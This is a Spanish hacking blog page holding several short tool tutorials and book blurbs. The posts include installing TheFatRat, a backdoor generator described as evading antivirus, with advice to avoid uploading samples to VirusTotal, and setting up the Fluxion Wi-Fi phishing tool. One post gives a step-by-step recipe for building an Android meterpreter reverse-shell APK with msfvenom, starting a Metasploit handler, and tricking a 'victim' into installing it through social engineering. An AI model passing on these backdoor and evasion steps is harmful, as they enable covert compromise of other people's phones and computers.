Hacking Ético, Seguridad Informática, RedTeam, Pentesting.

domingo, 14 de mayo de 2017

Como Instalar FatRat (Generador de Backdoor)

5/14/2017 09:27:00 p. m. Posted by Secpronet , , , , , , No hay comentarios
FatRat
Que es:

Una herramienta fácil para generar backdoor y herramienta fácil de post ataque de explotación como el ataque del navegador, dll. Esta herramienta compila un malware con la carga útil popular y luego el malware compilado se puede ejecutar en windows, android, mac. El malware que se creó con esta herramienta también tiene la capacidad de omitir la mayoría de la protección de software AV.


Como se instala:

Lo primero que vamos hacer es clonar el repositorio desde github
https://github.com/Screetsec/TheFatRat.git 


luego de clonar el repositorio vamos a instalarlo pero para ello hay que darle permisos al setup. lo hacemos de la siguiente manera: chmod +x setup.sh 


Luego de los permisos procedemos con la instalación, ejecutamos lo siguiente: ./setup.sh  (en caso de no tener instalado un complemento el mismo setup lo descarga e instala.)




Una vez finalizado aparecera esto.


Ejecutandolo:

para poder usarlo tenemos que darle permiso a dos archivos de la siguiente forma tecleamos esto:  chmod +x fatrat  chmod +x powerfull.sh

 
  ya cono esto si lo ejecutamos de la siguiente manera: ./fatrat 


Nota: si quieres verificar el backdoor no subir a VIRUSTOTAL ya que las firmas son enviadas a las compañias de AV  subirlo a http://www.nodistribute.com/  es lo unico que piden los desarrolladores.



ahora si por fin ya lo pueden usar.





miércoles, 10 de mayo de 2017

Como Usar Hash Identifier

5/10/2017 10:03:00 p. m. Posted by Secpronet , , , , , No hay comentarios
Hash Identifier

Que es:

Software para identificar los diferentes tipos de hashes utilizados para cifrar datos y especialmente contraseñas.

Algoritmos de encriptación que identifica son:
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • MD2
  • MD4
  • MD5
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) - Joomla
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • y muchos mas.
 Como se usa:

Por defecto ya viene incorporado en Kali Linux.

Para utilizarlo nos vamos a la parte herramientas y nos dirigimos a donde dice passwords allí buscamos Hash Identifier nos aparecera esto.





Ahora lo que tenemos que hacer es colocar el hash y dejar que la herramienta haga su trabajo.


y nos mostrará las posibles encriptaciones

 




  

domingo, 7 de mayo de 2017

Como instalar John The Ripper

5/07/2017 07:38:00 p. m. Posted by Secpronet , , , , , 8 comments
John The Ripper



Definición:
Es un programa de criptografía que aplica fuerza bruta para descifrar contraseñas. Es capaz de romper varios algoritmos de cifrado o hash, como DES, SHA-1 y otros.


 Instalación:

abrir una terminal y copiar

wget http://www.openwall.com/john/j/john-1.8.0.tar.gz


Descomprimir

tar -xzvf john-1.8.0.tar.gz




entrar a la siguiente ruta o a donde lo instalaron copian y pegan
cd john-1.8.0/src/ 
make clean generic



por ultimo hacemos el test


ya lo podemos usar





sábado, 15 de abril de 2017

Instalar y usar Data Recovery Wizard

4/15/2017 06:26:00 p. m. Posted by Secpronet , , , No hay comentarios
Instalar y usar Data Recovery Wizard



Descripción:

EASEUS Data Recovery Wizard restaura ficheros eliminados incluso de discos formateados. También puede recuperar particiones que han sido borradas manteniendo la estructura de archivos.
La pantalla inicial del programa nos da tres opciones: Recuperar archivos eliminados, restaurar todos los ficheros de una partición o restaurar la partición misma.

Tutorial:

martes, 24 de enero de 2017

Instalar y Corregir errores de fluxion en kali linux

1/24/2017 08:40:00 p. m. Posted by Secpronet , , , , 7 comments
Instalar y Corregir errores de fluxion

Que es fluxion:
Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf

Es una nueva herramienta para hacer auditorias de seguridad inalámbrica. su funcionamiento es similar a wifite lanzando ataques de ingeniería social para que el usuario la coloque la contraseña y verificar si es la correcta.
si has tratado de instalar  fluxion te darás cuenta que te muestra errores que faltan ciertos componentes para instalar antes de ejecutarlo, pues  esta vez veremos su instalación y como corregir los errores de los componentes faltantes.



los errores de componentes son los siguientes:

dhcp-server
hostapd
lighttpd
php5-cgi


Como instalar

lo podemos hacer de dos formas.
1. clonando desde github
2. descargando desde acá:  Fluxion

abrimos una terminal , vamos al directorio donde esta y lo desempaquetamos (Descargas, Documentos, Escritorio, etc).
colocamos: sudo unzip fluxion-master
entramos al directorio cd fluxion-master luego lo corremos de la siguiente forma ./fluxion
veremos que nos muestra unos errores de color rojo, comenzamos a corregirlos.



abrimos una nueva terminal y colocamos lo siguiente:
leafpad /etc/apt/sources.list



luego de esto colocamos la lineas para los repositorios desde la pagina oficial de kali linux  


luego guardamos cambios, en la terminal colocamos lo siguiente , apt-get update esperamos que actualice, luego colocamos lo siguiente.

apt-get install isc-dhcp-server


esperamos que instale luego colocamos.

apt-get install hostapd


esperamos que instale luego colocamos esto
apt-get install lighttpd



para la instalación de php5-cgi debemos hacer lo siguiente, en una terminal nueva colocamos esto 
leafpad /etc/apt/sources.list y copiamos lo siguiente.  




deb http://old.kali.org/kali sana main non-free contrib, quedando de la siguiente forma



guardamos los cambios y ejecutamos lo siguiente: apt-get update esperamos que actualice y ejecutamos lo siguiente.

apt-get remove php5 php5-common php5-mysql php5-xmlrpc php5-cgi php5-curl php5-gd php5-cli php5-fpm php-apc php-pear php5-dev php5-imap php5-mcrypt



esperamos que termine y luego ejecutamosapt-get install libapache2-mod-php5 esperamos que termine la instalación.




ya para terminar ejecutamos 


apt-get install php5-cgi

esperamos que termine de instalar, ahora ya podemos ejecutar fluxion sin ningún problema
lo hacemos desde la siguiente forma, entramos al directorio donde lo tenemos guardado o clonado
colocamos ./fluxion y les quedaría de la siguiente forma.




ya con esto estar funcionando fluxion.













Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf


Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.dpuf
Fluxion es una nueva herramienta para realizar auditorías de redes inalámbricas Wi-Fi. - See more at: https://www.redeszone.net/2016/09/28/fluxion-una-nueva-herramienta-obtener-claves-wi-fi-wpa-wpa2-ingenieria-social/#sthash.1hc8CGFh.

domingo, 8 de enero de 2017

Como vulnerar un dispositivo Android

1/08/2017 11:55:00 p. m. Posted by Secpronet , , , , , No hay comentarios
Vulnerar un dispositivo Android


Que tal esta vez les enseñaremos a vulnerar android.

primer paso: 
abriremos una terminal en Kali Linux y escribiremos lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp LHOST = tu ip LPORT = puerto a la escucha R > /ruta donde lo guardaras/nombre.apk




Segundo Paso: 

Luego nos quedará el archivo del al siguiente manera:



Tercer Paso: 

Abrimos metasploit y lo configuramos de la siguiente manera:
use exploit/multi/handler
set payload andorid/meterpreter/reverse_tcp
set lhost tu_ip
set lport el puerto que colocaron en el archivo que se creo 
exploit (esto es para lanzar el ataque)



Cuarto Paso: 
Tenemos que mandarlo a nuestra victima y usando ingeniería social hacer que lo instale, una vez instalado se abrirá creara la sesión.




con esto ya tenemos acceso al sistema.


para mas comandos escriben Help.

miércoles, 28 de diciembre de 2016

Hacking y manipulación de paquetes IPv4 con Python y Scapy

12/28/2016 05:28:00 p. m. Posted by Secpronet , , , , , , , 2 comments
" Libro Hacking y manipulación de paquetes IPv4 con Python y Scapy"

Es un libro multimedia con vídeos, ilustraciones, códigos fuente e imágenes interactivas, que hará que el lector aprenda de forma práctica y muy visual:
Scapy es una de las herramientas de manipulación de paquetes más importantes. Además cuenta con la añadida cualidad de poder usarse como librería en nuestro propio software, permitiéndonos diseñar programas basándonos en él.
Este libro consta un contenido teórico acotado, pero suficiente, para que el alumno puede entender todos los conceptos explicados: desde la base hasta los aspectos más avanzados.
Aprenderá a desenvolverse con soltura en la línea de comandos y el CLI de Scapy. La paralelización de tareas y los entresijos de los hilos de Python: limitaciones, características, cuándo usarlos y cuándo no es conveniente.
Practicará con autómatas de estados finitos: diseñándolos e implementándolos usando Scapy y su Automaton. Todo ello sin necesidad de aprender las compleja teoría matemática que lo envuelve.

ÍNDICE DEL LIBRO

·         Introducción a Scapy
o   ¿Qué es Scapy?
o   El modo interactivo
o   Funciones de ayuda
o   Construcción de un paquete básico

·         Uso avanzado de Scapy
o   ¿Qué es un layer?
o   Pila TCP/IP y layers de Scapy
o   Layers más usados
o   Párametros de los layers
o   Modos de envío
o   Análisis de respuestas
o   Lectura de ficheros PCAP
o   Reinyección en modo flood
o   Creación de un nuevo layer
o   Exportar información y creación de gráficas

·         Usando Scapy como librería
o   Funciones y llamadas
o   Envío de información
o   Scapy y multi-threading
o   Interceptación de paquetes y el sistema operativo
o   Logging remoto con Syslog y Scapy
o   Automaton: El autómata de estados finitos de Scapy

                            

lunes, 26 de diciembre de 2016

Colección de 24 revistas redusers

12/26/2016 02:22:00 p. m. Posted by Secpronet , , , , No hay comentarios


Técnico en Redes y Seguridad


Se trata de una obra que contempla todos los conocimientos necesarios para el diseño, cálculo, presupuesto e instalación de redes.

Desarrollan en detalle todos los temas necesarios para convertirse en un experto y dedicarse profesionalmente a instalar redes de cualquier tamaño. Ayudará a aprender las herramientas necesarias para afrontar el diseño, el cálculo del presupuesto de un trabajo de instalación de red, y el montaje del cableado estructurado, los racks y los servidores.

También aportará conocimientos sobre el software necesario para la instalación y configuración de servicios, y el diagnósitco y la resolución de problemas de red. Y todo esto con explicaciones claras  y exhaustivas, y con ilustraciones didácticas, para ayudar a comprender todo lo necesario para instalar una red.

A lo largo de este curso se enseñará a armar servidores de red, configurar el sistema operativo, instalar el software necesario, y crear y administrar dominios y políticas de grupo, así como directivas de seguridad, tanto en sistemas operativos Windows, como en distribuciones GNU/Linux (y la interacción entre ambos ámbitos).





domingo, 13 de noviembre de 2016

Libro Hacking Web Technologies

11/13/2016 04:45:00 p. m. Posted by Secpronet , , , , , , , , , , 2 comments

Hacking Web Technologies

Resumen:


Una auditoría web es un proceso largo, extendido y complejo, el cual está compuesto de varios subprocesos. No todo es encontrar una inyección SQL, sino que el proceso está compuesto de descubrimiento de activos, de evaluación de información y leaks, de otro tipo de pruebas que verifican el estado de seguridad de los activos que componen o sustentan las aplicaciones web de tu organización.
En este libro se tratan técnicas avanzadas sobre el fuzzing a aplicaciones web, el descubrimiento de leaks en las aplicaciones de la organización que en muchas situaciones suponen pequeñas fugas de información, pero que en otras ocasiones pueden suponer un hackeo y robo de información sensible. Las técnicas de ejecución de código siguen estando en el orden del día y pueden suponer el final del juego en una auditoría web.
Hoy en día las tecnologías NoSQL están cobrando cada vez más importancia, y por ello hay que tener en el radar las técnicas NoSQL Injection. Por otro lado, LDAP Injection o XPath Injection también son importantes, ya que no hay que olvidar que las inyecciones son el Top 1 en el ranking de vulnerabilidades de OWASP.







jueves, 13 de octubre de 2016

Que es y como Instalar Acunetix

10/13/2016 09:00:00 p. m. Posted by Secpronet No hay comentarios

Acunetix



Que es:
Acunetix es un escáner de vulnerabilidades de aplicaciones web. La herramienta está diseñada para encontrar agujeros de seguridad en las aplicaciones web de la organización que un atacante podría aprovechar para obtener acceso a los sistemas y datos.

Acunetix Vulnerability Scanner rastrea de forma automática y explora sitios web hechos a medida y aplicaciones web para buscar probelmas de SQL Injection, XSS, XXE, SSRF, Ataques de encabezado de host y más de 500 otras vulnerabilidades web.


Como se instala: